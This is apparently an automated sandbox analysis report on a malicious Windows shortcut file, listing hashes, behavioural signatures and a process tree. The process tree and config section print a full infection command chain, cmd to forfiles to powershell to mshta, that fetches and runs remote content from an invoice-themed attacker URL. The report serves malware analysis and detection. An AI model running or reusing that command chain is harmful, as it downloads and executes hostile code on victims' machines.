Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17-05-2024 12:12
Static task
static1
Behavioral task
behavioral1
Sample
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Resource
win10v2004-20240508-en
General
-
Target
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
-
Size
148KB
-
MD5
d39a73de9f109e3dba408e9481998206
-
SHA1
30651dada81443db0fde9c3a336955d27b6d9024
-
SHA256
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30
-
SHA512
09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61
-
SSDEEP
24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW
Malware Config
Extracted
https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
Signatures
-
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2532 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exeforfiles.exepowershell.exedescription pid process target process PID 1652 wrote to memory of 2672 1652 cmd.exe forfiles.exe PID 1652 wrote to memory of 2672 1652 cmd.exe forfiles.exe PID 1652 wrote to memory of 2672 1652 cmd.exe forfiles.exe PID 2672 wrote to memory of 2532 2672 forfiles.exe powershell.exe PID 2672 wrote to memory of 2532 2672 forfiles.exe powershell.exe PID 2672 wrote to memory of 2532 2672 forfiles.exe powershell.exe PID 2532 wrote to memory of 2720 2532 powershell.exe mshta.exe PID 2532 wrote to memory of 2720 2532 powershell.exe mshta.exe PID 2532 wrote to memory of 2720 2532 powershell.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"2⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice4⤵
- Modifies Internet Explorer settings
PID:2720